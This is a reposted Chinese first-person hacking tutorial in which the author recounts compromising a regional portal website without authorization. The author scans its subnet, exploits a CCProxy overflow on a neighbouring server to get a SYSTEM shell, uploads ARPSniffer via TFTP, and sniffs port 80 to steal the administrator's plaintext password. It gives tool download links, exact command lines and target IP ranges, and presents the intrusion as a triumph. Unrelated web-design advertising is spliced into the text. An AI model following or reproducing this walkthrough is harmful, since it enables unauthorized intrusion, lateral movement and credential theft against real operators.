新聞中心
還記得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章嗎?自從上次入侵之后,網(wǎng)站的管理員想盡了辦法堵住了所有SQL注入漏洞,想通過SQL注入后臺管理頁面已經(jīng)沒有可能了。真是郁悶,但是轉(zhuǎn)念一想,這正是一個練習(xí)技術(shù)的好機(jī)會,難道除了簡單的工具利用外,我就沒有其它的辦法了嗎?一定要想法子再次拿下這個站點。

創(chuàng)新互聯(lián)建站專業(yè)成都網(wǎng)站建設(shè)、成都網(wǎng)站設(shè)計,集網(wǎng)站策劃、網(wǎng)站設(shè)計、網(wǎng)站制作于一體,網(wǎng)站seo、網(wǎng)站優(yōu)化、網(wǎng)站營銷、軟文推廣等專業(yè)人才根據(jù)搜索規(guī)律編程設(shè)計,讓網(wǎng)站在運(yùn)行后,在搜索中有好的表現(xiàn),專業(yè)設(shè)計制作為您帶來效益的網(wǎng)站!讓網(wǎng)站建設(shè)為您創(chuàng)造效益。
一、掃描,突現(xiàn)新曙光
想來想去找不到什么好的辦法,閑著也無事,于是習(xí)慣性的用X-scan掃描了一下與本地信息港(203.207.***.2)位于同一C段的IP地址。結(jié)果在掃描到的結(jié)果中發(fā)現(xiàn)有許多存活主機(jī),而且其中有一些主機(jī)好像還有系統(tǒng)漏洞可以利用。唉,只可惜這些主機(jī)都不是我要進(jìn)攻的目標(biāo)!
面對掃描出來的結(jié)果發(fā)了好久的呆,突然大腦中靈光一閃冒出了一個念頭:這些網(wǎng)站中說不定有某個與信息港位于同一個交換機(jī)內(nèi)呢!如果我能進(jìn)入控制與信息港位于同一交換機(jī)下的站點,就可以利用小榕哥的另外一個工具ARPSniffer.EXE,監(jiān)聽信息港站點中的一舉一動,如果能嗅探到通過80端口傳輸?shù)叫畔⒏鄣木W(wǎng)站管理員密碼,不就成功地搞定信息港了嗎?看來方案可行!于是我開始了又一輪攻擊。 內(nèi)容來自"歲月聯(lián)盟"
二、利用溢出漏洞拿下第一站
在掃描到的C段IP地址中試驗了幾個站點,第一個站點居然還有SA空口令的漏洞,可惜連接上去后發(fā)現(xiàn)與信息港并不在同一個交換機(jī)下。另一個站點存在Serv-U溢出漏洞,可惜也無法利用。剩下的其它網(wǎng)站好像看不出有什么問題來,只有一個網(wǎng)站(203.207.***.44)有些奇怪,在端口掃描結(jié)果中發(fā)現(xiàn)它好像開放了“TCP 808”端口。也不知道這個奇怪的端口是拿來做什么的(如圖1)?
圖1
于是上Google搜索了一下,呵呵,這下收獲可大了!從搜索結(jié)果了解到,原來808端口是網(wǎng)站中一個叫作CCProxy的軟件打開的。CCProxy是國內(nèi)一個常用的代理服務(wù)器軟件,它可以輕松建立各種代理服務(wù)器,國內(nèi)的許多企業(yè)都使用它代理上網(wǎng),記得當(dāng)初我還用它將一臺肉雞建成了一個全能的代理服務(wù)器,怎么就給忘記了呢?恰巧被掃描的網(wǎng)站也是一個企業(yè)站點,看來這個網(wǎng)站的808端口十有八九是CCProxy打開的啦。
最重要的是從網(wǎng)上還了解到這個CCProxy代理服務(wù)器軟件剛發(fā)現(xiàn)了一個最新的遠(yuǎn)程漏洞,于是趕緊下載了一個溢出程序試試(下載地址:ttp://www.nuoya.org/down/soft/CCProxy.rar)。
(小提示:CCProxy打開的端口可能還有1080、2121等,這些是用來提供Socks和FTP服務(wù)的。)
CCProxy溢出程序的使用非常簡單,在命令窗口中輸入“ccpx 目標(biāo)IP地址 端口”,然后按提示操作即可(如圖2)。在溢出中會詢問本機(jī)是與攻擊目標(biāo)位于同一個IP段;如果是在同一IP地址段中的話,直接按“y”,就可以開始溢出了;如果本機(jī)與攻擊目標(biāo)不在一個IP地址段中的話,按下“n”,溢出程序?qū)⒗^續(xù)提示并詢問本機(jī)是否有一個公網(wǎng)IP地址(如圖3),如果沒有的話,還需要手工輸入自己的網(wǎng)關(guān)IP地址才可以開始溢出。溢出成功后,會在當(dāng)前命令窗口中自動連接攻擊目標(biāo)的24876端口,獲得遠(yuǎn)程主機(jī)的一個SYSTEM Shell。剩下來的事就是建立管理員帳號,常常的掌握這臺肉機(jī)。 [Syue.com]
圖2
圖3
三、上傳竊聽利器ARPSniffer
現(xiàn)在要通過手里的肉雞入侵信息港了。首先還是要查看一下兩個網(wǎng)站服務(wù)器是不是位于同一個交換機(jī)下。遠(yuǎn)程連接肉機(jī),在肉雞的CMD窗口中輸入命令“tracert 攻擊目標(biāo)IP地址”,令人興奮的是看到直接返回了目標(biāo)IP地址(如圖4),現(xiàn)在可以確定兩臺主機(jī)都在同一交換機(jī)下了,看來有戲啦!可以考慮用嗅探的方法從肉雞上獲取信息港的管理員密碼或者其它有用的信息。 現(xiàn)在要用到的是一個名叫“ARPSniffer.exe”的軟件(下載地址: http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。這個軟件有DOS版和WIN版,RPSniffer也是小榕哥開發(fā)的一款工具非常好的嗅探工具,它可以用在交換機(jī)的環(huán)境下。在使用這個竊聽工具前首先要使用機(jī)器上安裝WinPCAP驅(qū)動。怎么上傳ARPSniffer到肉雞上?還是老方法用TFTP傳送。在本機(jī)上運(yùn)行Tfpd32,將本機(jī)建成為一個TFTP服務(wù)器,點擊界面中的“Browse”按鈕,選擇ARPSniffer下載壓縮包的解壓路徑(如圖5),然后在肉雞的命令窗口中運(yùn)行“Get -i TFTP服務(wù)器IP地址 文件名”即可。在這里下載后的壓縮包中有兩個版本的程序,我們只需要上傳“arpsniffer.exe”和“WinPcap_3_0_a.exe”即可。上傳成功后先運(yùn)行“WinPcap_3_0_a.exe”安裝嗅探驅(qū)動程序。
圖4 (
圖5
本文來自"歲月聯(lián)盟"
四、利用ARPSniffer滲透攻擊真正目標(biāo)
現(xiàn)在是萬事具備,只欠嗅探。先在命令窗口中運(yùn)行“Ipconfig /all”命令,查看一下肉雞上的網(wǎng)址配置情況和網(wǎng)關(guān)IP地址(如圖6)。可以查到網(wǎng)關(guān)(Default Gateway)為“203.207.***.1”,運(yùn)行ARPSniffer命令:
“Arpsniffer 203.207.***.1 203.207.***.2 80 c:\password.txt”; 即可開始在肉雞上監(jiān)聽攻擊目標(biāo)IP的80端口了(如圖7)。攻擊目標(biāo)IP上所有通過80端口收發(fā)的密碼將被保存在“Password.txt”文件中。在嗅探時需要注意,如果在肉雞上安裝有兩塊網(wǎng)卡的話,還要在剛才的Arpsniffer命令后加上數(shù)字參數(shù)指定嗅探的網(wǎng)卡ID。
圖6
圖7
(小提示:當(dāng)然我們也可以竊聽其它的端口,如21和25端口等獲得Telnet密碼。但是由于管理員以Web方式登錄的幾率較大些,所以我們選擇了嗅探80Web端口。)
五、獲得管理員密碼
最后剩下來的事情就是坐著等待攻擊目標(biāo)網(wǎng)站上的管理員登錄了。很快就看到了肉雞上的命令窗口中有了反應(yīng),打開“password.txt”就可以看到密碼。不過由于我們還在監(jiān)聽過程中,所以“password.txt”文件是無法直接打開的,而且也不能復(fù)制。想要查看密碼記錄文件,必須先終止嗅探進(jìn)程??梢栽谌怆u嗅探窗口中直接按下“Ctrl+C”鍵,就可以中止嗅探了。不過可能同時也會將我們在本機(jī)與肉雞建立的連接窗口關(guān)閉掉了。結(jié)束后看一看,呵呵,真的有收獲啦,網(wǎng)站管理的密碼都以明文的方式保存在文本里面啦!現(xiàn)在還等什么呢?又可以以管理員身份登入信息港故地重游啦! [
網(wǎng)頁名稱:巧用竊聽玩“滲透”(圖)
標(biāo)題來源:http://www.dlmjj.cn/article/dpiedih.html


咨詢
建站咨詢
